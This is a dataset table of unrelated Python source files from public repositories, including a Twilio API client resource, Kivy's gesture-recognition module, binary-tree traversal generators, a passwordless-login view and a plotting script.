| code (string, 2-1.05M chars) | repo_name (string, 5-104 chars) | path (string, 4-251 chars) | language (1 class) | license (15 classes) | size (int32, 2-1.05M) |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaecookie.decorator import no_csrf
from gaepermission import facade
from gaepermission.decorator import login_not_required
from tekton import router
@no_csrf
@login_not_required
def index(_write_tmpl):
_write_tmpl('login/passwordless_info.html')
@login_not_required
def enviar_email(_handler, email, ret_path='/'):
url = 'https://livrogae.appspot.com' + router.to_path(checar, ret_path=ret_path)
facade.send_passwordless_login_link(email, url, 'pt_BR').execute()
_handler.redirect(router.to_path(index))
@no_csrf
@login_not_required
def checar(_handler, _resp, ticket, ret_path='/'):
facade.login_passwordless(ticket, _resp).execute()
_handler.redirect(ret_path)
@no_csrf
def form(_write_tmpl):
app = facade.get_passwordless_app_data().execute().result
dct = {'salvar_app_path': router.to_path(salvar), 'app': app}
_write_tmpl('login/passwordless_form.html', dct)
def salvar(_handler, app_id, token):
facade.save_or_update_passwordless_app_data(app_id, token).execute()
_handler.redirect('/')
| renzon/livrogae | backend/src/web/login/passwordless.py | Python | mit | 1,132 |
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import deserialize
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class RatePlanList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the RatePlanList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanList
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanList
"""
super(RatePlanList, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/RatePlans'.format(**self._solution)
def stream(self, limit=None, page_size=None):
"""
Streams RatePlanInstance records from the API as a generator stream.
This operation lazily loads records as efficiently as possible until the limit
is reached.
The results are returned as a generator, so this operation is memory efficient.
:param int limit: Upper limit for the number of records to return. stream()
guarantees to never return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, stream() will attempt to read the
limit with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
        :rtype: generator[twilio.rest.preview.wireless.rate_plan.RatePlanInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(page_size=limits['page_size'], )
return self._version.stream(page, limits['limit'])
def list(self, limit=None, page_size=None):
"""
Lists RatePlanInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
        :returns: List of up to limit results
:rtype: list[twilio.rest.preview.wireless.rate_plan.RatePlanInstance]
"""
return list(self.stream(limit=limit, page_size=page_size, ))
def page(self, page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of RatePlanInstance records from the API.
Request is executed immediately
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanPage
"""
data = values.of({'PageToken': page_token, 'Page': page_number, 'PageSize': page_size, })
response = self._version.page(method='GET', uri=self._uri, params=data, )
return RatePlanPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of RatePlanInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return RatePlanPage(self._version, response, self._solution)
def create(self, unique_name=values.unset, friendly_name=values.unset,
data_enabled=values.unset, data_limit=values.unset,
data_metering=values.unset, messaging_enabled=values.unset,
voice_enabled=values.unset, commands_enabled=values.unset,
national_roaming_enabled=values.unset,
international_roaming=values.unset):
"""
Create the RatePlanInstance
:param unicode unique_name: The unique_name
:param unicode friendly_name: The friendly_name
:param bool data_enabled: The data_enabled
:param unicode data_limit: The data_limit
:param unicode data_metering: The data_metering
:param bool messaging_enabled: The messaging_enabled
:param bool voice_enabled: The voice_enabled
:param bool commands_enabled: The commands_enabled
:param bool national_roaming_enabled: The national_roaming_enabled
:param list[unicode] international_roaming: The international_roaming
:returns: The created RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
data = values.of({
'UniqueName': unique_name,
'FriendlyName': friendly_name,
'DataEnabled': data_enabled,
'DataLimit': data_limit,
'DataMetering': data_metering,
'MessagingEnabled': messaging_enabled,
'VoiceEnabled': voice_enabled,
'CommandsEnabled': commands_enabled,
'NationalRoamingEnabled': national_roaming_enabled,
'InternationalRoaming': serialize.map(international_roaming, lambda e: e),
})
payload = self._version.create(method='POST', uri=self._uri, data=data, )
return RatePlanInstance(self._version, payload, )
def get(self, sid):
"""
Constructs a RatePlanContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanContext
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
return RatePlanContext(self._version, sid=sid, )
def __call__(self, sid):
"""
Constructs a RatePlanContext
:param sid: The sid
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanContext
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
return RatePlanContext(self._version, sid=sid, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.RatePlanList>'
class RatePlanPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the RatePlanPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanPage
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanPage
"""
super(RatePlanPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of RatePlanInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
return RatePlanInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.Wireless.RatePlanPage>'
class RatePlanContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, sid):
"""
Initialize the RatePlanContext
:param Version version: Version that contains the resource
:param sid: The sid
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanContext
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
super(RatePlanContext, self).__init__(version)
# Path Solution
self._solution = {'sid': sid, }
self._uri = '/RatePlans/{sid}'.format(**self._solution)
def fetch(self):
"""
Fetch the RatePlanInstance
:returns: The fetched RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
payload = self._version.fetch(method='GET', uri=self._uri, )
return RatePlanInstance(self._version, payload, sid=self._solution['sid'], )
def update(self, unique_name=values.unset, friendly_name=values.unset):
"""
Update the RatePlanInstance
:param unicode unique_name: The unique_name
:param unicode friendly_name: The friendly_name
:returns: The updated RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
data = values.of({'UniqueName': unique_name, 'FriendlyName': friendly_name, })
payload = self._version.update(method='POST', uri=self._uri, data=data, )
return RatePlanInstance(self._version, payload, sid=self._solution['sid'], )
def delete(self):
"""
Deletes the RatePlanInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._version.delete(method='DELETE', uri=self._uri, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.RatePlanContext {}>'.format(context)
class RatePlanInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload, sid=None):
"""
Initialize the RatePlanInstance
:returns: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
super(RatePlanInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'sid': payload.get('sid'),
'unique_name': payload.get('unique_name'),
'account_sid': payload.get('account_sid'),
'friendly_name': payload.get('friendly_name'),
'data_enabled': payload.get('data_enabled'),
'data_metering': payload.get('data_metering'),
'data_limit': deserialize.integer(payload.get('data_limit')),
'messaging_enabled': payload.get('messaging_enabled'),
'voice_enabled': payload.get('voice_enabled'),
'national_roaming_enabled': payload.get('national_roaming_enabled'),
'international_roaming': payload.get('international_roaming'),
'date_created': deserialize.iso8601_datetime(payload.get('date_created')),
'date_updated': deserialize.iso8601_datetime(payload.get('date_updated')),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {'sid': sid or self._properties['sid'], }
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: RatePlanContext for this RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanContext
"""
if self._context is None:
self._context = RatePlanContext(self._version, sid=self._solution['sid'], )
return self._context
@property
def sid(self):
"""
:returns: The sid
:rtype: unicode
"""
return self._properties['sid']
@property
def unique_name(self):
"""
:returns: The unique_name
:rtype: unicode
"""
return self._properties['unique_name']
@property
def account_sid(self):
"""
:returns: The account_sid
:rtype: unicode
"""
return self._properties['account_sid']
@property
def friendly_name(self):
"""
:returns: The friendly_name
:rtype: unicode
"""
return self._properties['friendly_name']
@property
def data_enabled(self):
"""
:returns: The data_enabled
:rtype: bool
"""
return self._properties['data_enabled']
@property
def data_metering(self):
"""
:returns: The data_metering
:rtype: unicode
"""
return self._properties['data_metering']
@property
def data_limit(self):
"""
:returns: The data_limit
:rtype: unicode
"""
return self._properties['data_limit']
@property
def messaging_enabled(self):
"""
:returns: The messaging_enabled
:rtype: bool
"""
return self._properties['messaging_enabled']
@property
def voice_enabled(self):
"""
:returns: The voice_enabled
:rtype: bool
"""
return self._properties['voice_enabled']
@property
def national_roaming_enabled(self):
"""
:returns: The national_roaming_enabled
:rtype: bool
"""
return self._properties['national_roaming_enabled']
@property
def international_roaming(self):
"""
:returns: The international_roaming
:rtype: list[unicode]
"""
return self._properties['international_roaming']
@property
def date_created(self):
"""
:returns: The date_created
:rtype: datetime
"""
return self._properties['date_created']
@property
def date_updated(self):
"""
:returns: The date_updated
:rtype: datetime
"""
return self._properties['date_updated']
@property
def url(self):
"""
:returns: The url
:rtype: unicode
"""
return self._properties['url']
def fetch(self):
"""
Fetch the RatePlanInstance
:returns: The fetched RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
return self._proxy.fetch()
def update(self, unique_name=values.unset, friendly_name=values.unset):
"""
Update the RatePlanInstance
:param unicode unique_name: The unique_name
:param unicode friendly_name: The friendly_name
:returns: The updated RatePlanInstance
:rtype: twilio.rest.preview.wireless.rate_plan.RatePlanInstance
"""
return self._proxy.update(unique_name=unique_name, friendly_name=friendly_name, )
def delete(self):
"""
Deletes the RatePlanInstance
:returns: True if delete succeeds, False otherwise
:rtype: bool
"""
return self._proxy.delete()
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.Wireless.RatePlanInstance {}>'.format(context)
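A short usage sketch for the resource above, assuming a configured REST `Client` whose `preview.wireless.rate_plans` accessor exposes this `RatePlanList`; the credentials and plan names are placeholders:

```python
# Hypothetical usage; ACCOUNT_SID / AUTH_TOKEN are placeholders.
from twilio.rest import Client

client = Client('ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX', 'your_auth_token')
rate_plans = client.preview.wireless.rate_plans

# Create a plan, then lazily stream existing ones.
plan = rate_plans.create(unique_name='dev-plan', friendly_name='Developer Plan',
                         data_enabled=True)
for rp in rate_plans.stream(limit=20):
    print(rp.sid, rp.unique_name)

# Fetch, update and delete through the context keyed by sid.
context = rate_plans(plan.sid)
context.update(friendly_name='Renamed Plan')
context.delete()
```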
| twilio/twilio-python | twilio/rest/preview/wireless/rate_plan.py | Python | mit | 16,909 |
"""
This library implements a simple set of parallel processing utilities that
take advantage of python's `multiprocessing` module to distribute processing
over multiple CPUs on a single machine. The most salient feature of this
library is the `map()` function that can be used to distribute CPU-intensive
processing of a collection of items over multiple cores.
"""
from .map import map
from .about import (__name__, __version__, __author__, __author_email__,
__description__, __license__, __url__)
__all__ = ['map',
           '__name__', '__version__', '__author__', '__author_email__',
           '__description__', '__license__', '__url__']
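A minimal usage sketch of the `map()` described above; the worker function is applied to each item on a separate process. The `mappers` keyword (worker count) and the yield-per-item convention are assumptions about this API, not confirmed by the snippet:

```python
# Hypothetical sketch: `process` runs on worker processes and may yield
# zero or more results per input item.
import para

def process(number):
    yield number, sum(i * i for i in range(number))

if __name__ == '__main__':
    for number, total in para.map(process, range(10000, 10010), mappers=4):
        print(number, total)
```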
| halfak/python-para | para/__init__.py | Python | mit | 652 |
from setuptools import setup
setup(
name='pandas_redshift',
packages=['pandas_redshift'],
version='2.0.5',
description='Load data from redshift into a pandas DataFrame and vice versa.',
author='Aidan Gawronski',
author_email='aidangawronski@gmail.com',
# url = 'https://github.com/agawronski/pandas_redshift',
python_requires='>=3',
install_requires=['psycopg2-binary',
'pandas',
'boto3'],
include_package_data=True
)
| agawronski/pandas_redshift | setup.py | Python | mit | 503 |
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
print "hahahahahaah!"
| SuperJerry/Swift | python/test.py | Python | mit | 199 |
import numpy as np
import time
import datetime
SIMULATED_TIME_MAIN = 60 * 60 * 24 * 10
SIMULATED_TIME_FORECAST = 60 * 60 * 24 * 100
def plot_dataset(sensordata,forecast_start=0,block=True):
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
forecast_plot, = ax.plot(range(forecast_start,len(sensordata["forecasted"])+forecast_start), sensordata["forecasted"], label="forecasted")
sim_plot, = ax.plot(range(len(sensordata["measured"])), sensordata["measured"], label="measured")
# Now add the legend with some customizations.
legend = ax.legend(loc='upper center', shadow=True)
# The frame is matplotlib.patches.Rectangle instance surrounding the legend.
frame = legend.get_frame()
frame.set_facecolor('0.90')
# Set the fontsize
for label in legend.get_texts():
label.set_fontsize('medium')
for label in legend.get_lines():
label.set_linewidth(1.5)
plt.subplots_adjust(bottom=0.2)
plt.xlabel('Simulated time in seconds')
plt.xticks(rotation=90)
plt.grid(True)
    plt.show(block)
def show_plotting(plt, ax, block):
#import matplotlib.pyplot as plt
# Now add the legend with some customizations.
legend = ax.legend(loc='upper center', shadow=True,prop={'size':18})
# The frame is matplotlib.patches.Rectangle instance surrounding the legend.
frame = legend.get_frame()
frame.set_facecolor('0.90')
# Set the fontsize
for label in legend.get_texts():
label.set_fontsize('large')
for label in legend.get_lines():
label.set_linewidth(5.5)
plt.subplots_adjust(bottom=0.2)
#plt.xlabel('Simulated time in seconds')
#plt.xticks(rotation=90)
plt.tick_params(axis='both', which='major', labelsize=16)
plt.tick_params(axis='both', which='minor', labelsize=14)
plt.grid(True)
plt.show(block)
class Plotting(object):
def __init__(self):
self.measure_values = [
'time', 'cu_workload', 'plb_workload', 'hs_temperature',
'thermal_consumption', 'outside_temperature', 'electrical_consumption']
# self.simulation_manager = SimulationManager(
# initial_time=1396915200) # 8.4.2014
        self.plot_new_simulation(SIMULATED_TIME_FORECAST, "Forecast1")
def plot_new_simulation(self, simulated_time, title, datasheet=None):
import matplotlib.pyplot as plt
data = {}
for name in self.measure_values:
data[name] = []
(simulation, measurements) = self.simulation_manager.forecast_for(
simulated_time, blocking=False)
env = simulation.env
rule_strategy = RuleStrategy(env, self.simulation_manager)
# supply environment with measurement function
env.register_step_function(self.step_function, {
"env": env, "measurement_cache": measurements, "data": data, "rule_strategy": rule_strategy})
while env.forward > 0:
time.sleep(0.2)
t = []
for value in data["time"]:
t.append(datetime.datetime.fromtimestamp(value))
        plot_dataset(data)
plt.show(block=True)
def step_function(self, kwargs):
self.measure_function(kwargs)
if "rule_strategy" in kwargs:
rule_strategy = kwargs["rule_strategy"]
rule_strategy.step_function()
def measure_function(self, kwargs):
env = kwargs["env"]
if env.now % 3600 == 0.0:
measurements = kwargs["measurement_cache"]
data = kwargs["data"]
for value in self.measure_values:
data[value].append(measurements.get_mapped_value(value))
if __name__ == "__main__":
Plotting()
| SEC-i/ecoControl | server/forecasting/tools/plotting.py | Python | mit | 3,818 |
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def preorder(bt):
"A preorder traversal of a binary tree"
children = [bt]
while children:
n = children.pop()
if n.right:
children.append(n.right)
if n.left:
children.append(n.left)
yield n.val
def inorder(bst):
"An inorder traversal of a binary tree"
parents = []
def traverse_left(n):
while n is not None:
parents.append(n)
n = n.left
traverse_left(bst)
while parents:
bst = parents.pop()
yield bst.val
traverse_left(bst.right)
def postorder(root):
# if root.left:
# for n in postorder(root.left):
# yield n
# if root.right:
# for n in postorder(root.right):
# yield n
# yield root.val
# prev = None
# s = [root]
# while s:
# c = s[-1]
# going down
# if not prev or prev.left is c or prev.right is c:
# if c.left:
# s.append(c.left)
# elif c.right:
# s.append(c.right)
# else:
# yield c.val
# s.pop()
# traversing up from left
# elif c.left is prev:
# if c.right:
# s.append(c.right)
# else:
# yield c.val
# s.pop()
# traversing up from right
# elif c.right is prev:
# yield c.val
# s.pop()
# prev = c
s = []
prev = None
current = root
while s or current:
if current:
s.append(current)
current = current.left
else:
p = s[-1]
if p.right and prev is not p.right:
current = p.right
else:
yield p.val
prev = s.pop()
if __name__ == '__main__':
# http://en.wikipedia.org/wiki/Tree_traversal
f = TreeNode("F")
f.left = TreeNode("B")
f.right = TreeNode("G")
f.left.left = TreeNode("A")
f.left.right = TreeNode("D")
f.left.right.left = TreeNode("C")
f.left.right.right = TreeNode("E")
f.right.right = TreeNode("I")
f.right.right.left = TreeNode("H")
assert list(preorder(f)) == ['F', 'B', 'A', 'D', 'C', 'E', 'G', 'I', 'H']
assert list(inorder(f)) == ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']
assert list(postorder(f)) == ['A', 'C', 'E', 'D', 'B', 'H', 'I', 'G', 'F']
| calebperkins/algorithms | algorithms/trees.py | Python | mit | 2,540 |
'''
Gesture recognition
===================
This class allows you to easily create new
gestures and compare them::
from kivy.gesture import Gesture, GestureDatabase
# Create a gesture
g = Gesture()
g.add_stroke(point_list=[(1,1), (3,4), (2,1)])
g.normalize()
# Add it to the database
gdb = GestureDatabase()
gdb.add_gesture(g)
# And for the next gesture, try to find it!
g2 = Gesture()
# ...
gdb.find(g2)
.. warning::
You don't really want to do this: it's more of an example of how
to construct gestures dynamically. Typically, you would
need a lot more points, so it's better to record gestures in a file and
reload them to compare later. Look in the examples/gestures directory for
an example of how to do that.
'''
__all__ = ('Gesture', 'GestureDatabase', 'GesturePoint', 'GestureStroke')
import pickle
import base64
import zlib
import math
from kivy.compat import PY2
from kivy.vector import Vector
# XXX we can't use io.StringIO in PY2 because it requires unicode
# PY2 / StringIO ( str or unicode )
# PY2 / cStringIO ( str )
# PY3 / io.StringIO ( unicode )
if PY2:
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
else:
from io import StringIO
class GestureDatabase(object):
'''Class to handle a gesture database.'''
def __init__(self):
self.db = []
def add_gesture(self, gesture):
'''Add a new gesture to the database.'''
self.db.append(gesture)
def find(self, gesture, minscore=0.9, rotation_invariant=True):
'''Find a matching gesture in the database.'''
if not gesture:
return
best = None
bestscore = minscore
for g in self.db:
score = g.get_score(gesture, rotation_invariant)
if score < bestscore:
continue
bestscore = score
best = g
if not best:
return
return (bestscore, best)
def gesture_to_str(self, gesture):
'''Convert a gesture into a unique string.'''
io = StringIO()
p = pickle.Pickler(io)
p.dump(gesture)
data = base64.b64encode(zlib.compress(io.getvalue(), 9))
return data
def str_to_gesture(self, data):
'''Convert a unique string to a gesture.'''
io = StringIO(zlib.decompress(base64.b64decode(data)))
p = pickle.Unpickler(io)
gesture = p.load()
return gesture
class GesturePoint:
def __init__(self, x, y):
'''Stores the x,y coordinates of a point in the gesture.'''
self.x = float(x)
self.y = float(y)
def scale(self, factor):
''' Scales the point by the given factor.'''
self.x *= factor
self.y *= factor
return self
def __repr__(self):
return 'Mouse_point: %f,%f' % (self.x, self.y)
class GestureStroke:
''' Gestures can be made up of multiple strokes.'''
def __init__(self):
''' A stroke in the gesture.'''
self.points = list()
self.screenpoints = list()
# These return the min and max coordinates of the stroke
@property
def max_x(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.x).x
@property
def min_x(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.x).x
@property
def max_y(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.y).y
@property
def min_y(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.y).y
def add_point(self, x, y):
'''
add_point(x=x_pos, y=y_pos)
Adds a point to the stroke.
'''
self.points.append(GesturePoint(x, y))
self.screenpoints.append((x, y))
def scale_stroke(self, scale_factor):
'''
scale_stroke(scale_factor=float)
Scales the stroke down by scale_factor.
'''
self.points = [pt.scale(scale_factor) for pt in self.points]
def points_distance(self, point1, point2):
'''
points_distance(point1=GesturePoint, point2=GesturePoint)
Returns the distance between two GesturePoints.
'''
x = point1.x - point2.x
y = point1.y - point2.y
return math.sqrt(x * x + y * y)
def stroke_length(self, point_list=None):
'''Finds the length of the stroke. If a point list is given,
finds the length of that list.
'''
if point_list is None:
point_list = self.points
gesture_length = 0.0
if len(point_list) <= 1: # If there is only one point -> no length
return gesture_length
for i in range(len(point_list) - 1):
gesture_length += self.points_distance(
point_list[i], point_list[i + 1])
return gesture_length
def normalize_stroke(self, sample_points=32):
'''Normalizes strokes so that every stroke has a standard number of
points. Returns True if stroke is normalized, False if it can't be
normalized. sample_points controls the resolution of the stroke.
'''
# If there is only one point or the length is 0, don't normalize
if len(self.points) <= 1 or self.stroke_length(self.points) == 0.0:
return False
# Calculate how long each point should be in the stroke
target_stroke_size = \
self.stroke_length(self.points) / float(sample_points)
new_points = list()
new_points.append(self.points[0])
# We loop on the points
prev = self.points[0]
src_distance = 0.0
dst_distance = target_stroke_size
for curr in self.points[1:]:
d = self.points_distance(prev, curr)
if d > 0:
prev = curr
src_distance = src_distance + d
                # The new point needs to be inserted into the
# segment [prev, curr]
while dst_distance < src_distance:
x_dir = curr.x - prev.x
y_dir = curr.y - prev.y
ratio = (src_distance - dst_distance) / d
to_x = x_dir * ratio + prev.x
to_y = y_dir * ratio + prev.y
new_points.append(GesturePoint(to_x, to_y))
dst_distance = self.stroke_length(self.points) / \
float(sample_points) * len(new_points)
        # If this happens, we are in trouble...
if not len(new_points) == sample_points:
raise ValueError('Invalid number of strokes points; got '
'%d while it should be %d' %
(len(new_points), sample_points))
self.points = new_points
return True
def center_stroke(self, offset_x, offset_y):
        '''Centers the stroke by offsetting the points.'''
for point in self.points:
point.x -= offset_x
point.y -= offset_y
class Gesture:
'''A python implementation of a gesture recognition algorithm by
Oleg Dopertchouk: http://www.gamedev.net/reference/articles/article2039.asp
Implemented by Jeiel Aranal (chemikhazi@gmail.com),
released into the public domain.
'''
# Tolerance for evaluation using the '==' operator
DEFAULT_TOLERANCE = 0.1
def __init__(self, tolerance=None):
'''
Gesture([tolerance=float])
Creates a new gesture with an optional matching tolerance value.
'''
self.width = 0.
self.height = 0.
self.gesture_product = 0.
self.strokes = list()
if tolerance is None:
self.tolerance = Gesture.DEFAULT_TOLERANCE
else:
self.tolerance = tolerance
def _scale_gesture(self):
''' Scales down the gesture to a unit of 1.'''
        # list comprehensions gather the min/max coordinates of the strokes
        # in the gesture and min()/max() pull the lowest/highest value
min_x = min([stroke.min_x for stroke in self.strokes])
max_x = max([stroke.max_x for stroke in self.strokes])
min_y = min([stroke.min_y for stroke in self.strokes])
max_y = max([stroke.max_y for stroke in self.strokes])
x_len = max_x - min_x
self.width = x_len
y_len = max_y - min_y
self.height = y_len
scale_factor = max(x_len, y_len)
if scale_factor <= 0.0:
return False
scale_factor = 1.0 / scale_factor
for stroke in self.strokes:
stroke.scale_stroke(scale_factor)
return True
def _center_gesture(self):
''' Centers the Gesture.points of the gesture.'''
total_x = 0.0
total_y = 0.0
total_points = 0
for stroke in self.strokes:
# adds up all the points inside the stroke
stroke_y = sum([pt.y for pt in stroke.points])
stroke_x = sum([pt.x for pt in stroke.points])
total_y += stroke_y
total_x += stroke_x
total_points += len(stroke.points)
if total_points == 0:
return False
# Average to get the offset
total_x /= total_points
total_y /= total_points
# Apply the offset to the strokes
for stroke in self.strokes:
stroke.center_stroke(total_x, total_y)
return True
def add_stroke(self, point_list=None):
'''Adds a stroke to the gesture and returns the Stroke instance.
Optional point_list argument is a list of the mouse points for
the stroke.
'''
self.strokes.append(GestureStroke())
if isinstance(point_list, list) or isinstance(point_list, tuple):
for point in point_list:
if isinstance(point, GesturePoint):
self.strokes[-1].points.append(point)
elif isinstance(point, list) or isinstance(point, tuple):
if len(point) != 2:
raise ValueError("Stroke entry must have 2 values max")
self.strokes[-1].add_point(point[0], point[1])
else:
raise TypeError("The point list should either be "
"tuples of x and y or a list of "
"GesturePoint objects")
elif point_list is not None:
raise ValueError("point_list should be a tuple/list")
return self.strokes[-1]
def normalize(self, stroke_samples=32):
'''Runs the gesture normalization algorithm and calculates the dot
product with self.
'''
if not self._scale_gesture() or not self._center_gesture():
self.gesture_product = False
return False
for stroke in self.strokes:
stroke.normalize_stroke(stroke_samples)
self.gesture_product = self.dot_product(self)
def get_rigid_rotation(self, dstpts):
'''
Extract the rotation to apply to a group of points to minimize the
distance to a second group of points. The two groups of points are
assumed to be centered. This is a simple version that just picks
an angle based on the first point of the gesture.
'''
if len(self.strokes) < 1 or len(self.strokes[0].points) < 1:
return 0
if len(dstpts.strokes) < 1 or len(dstpts.strokes[0].points) < 1:
return 0
p = dstpts.strokes[0].points[0]
target = Vector([p.x, p.y])
source = Vector([p.x, p.y])
return source.angle(target)
def dot_product(self, comparison_gesture):
''' Calculates the dot product of the gesture with another gesture.'''
if len(comparison_gesture.strokes) != len(self.strokes):
return -1
if getattr(comparison_gesture, 'gesture_product', True) is False or \
getattr(self, 'gesture_product', True) is False:
return -1
dot_product = 0.0
for stroke_index, (my_stroke, cmp_stroke) in enumerate(
list(zip(self.strokes, comparison_gesture.strokes))):
for pt_index, (my_point, cmp_point) in enumerate(
list(zip(my_stroke.points, cmp_stroke.points))):
dot_product += (my_point.x * cmp_point.x +
my_point.y * cmp_point.y)
return dot_product
def rotate(self, angle):
g = Gesture()
for stroke in self.strokes:
tmp = []
for j in stroke.points:
v = Vector([j.x, j.y]).rotate(angle)
tmp.append(v)
g.add_stroke(tmp)
g.gesture_product = g.dot_product(g)
return g
def get_score(self, comparison_gesture, rotation_invariant=True):
''' Returns the matching score of the gesture against another gesture.
'''
if isinstance(comparison_gesture, Gesture):
if rotation_invariant:
# get orientation
angle = self.get_rigid_rotation(comparison_gesture)
# rotate the gesture to be in the same frame.
comparison_gesture = comparison_gesture.rotate(angle)
# this is the normal "orientation" code.
score = self.dot_product(comparison_gesture)
if score <= 0:
return score
score /= math.sqrt(
self.gesture_product * comparison_gesture.gesture_product)
return score
def __eq__(self, comparison_gesture):
''' Allows easy comparisons between gesture instances.'''
if isinstance(comparison_gesture, Gesture):
# If the gestures don't have the same number of strokes, its
# definitely not the same gesture
score = self.get_score(comparison_gesture)
if (score > (1.0 - self.tolerance) and
score < (1.0 + self.tolerance)):
return True
else:
return False
else:
return NotImplemented
def __ne__(self, comparison_gesture):
result = self.__eq__(comparison_gesture)
if result is NotImplemented:
return result
else:
return not result
def __lt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <")
def __gt__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >")
def __le__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with <=")
def __ge__(self, comparison_gesture):
raise TypeError("Gesture cannot be evaluated with >=")
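A small round-trip sketch using only calls defined above, extending the docstring example with the string serialization helpers:

```python
from kivy.gesture import Gesture, GestureDatabase

gdb = GestureDatabase()
g = Gesture()
g.add_stroke(point_list=[(1, 1), (3, 4), (2, 1)])
g.normalize()

# Serialize to a compressed, base64-encoded string and load it back.
data = gdb.gesture_to_str(g)
g2 = gdb.str_to_gesture(data)
gdb.add_gesture(g2)

# A score close to 1.0 means the two gestures have the same shape.
print(g.get_score(g2))
```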
| Davideddu/kivy-forkedtouch | kivy/gesture.py | Python | mit | 14,948 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
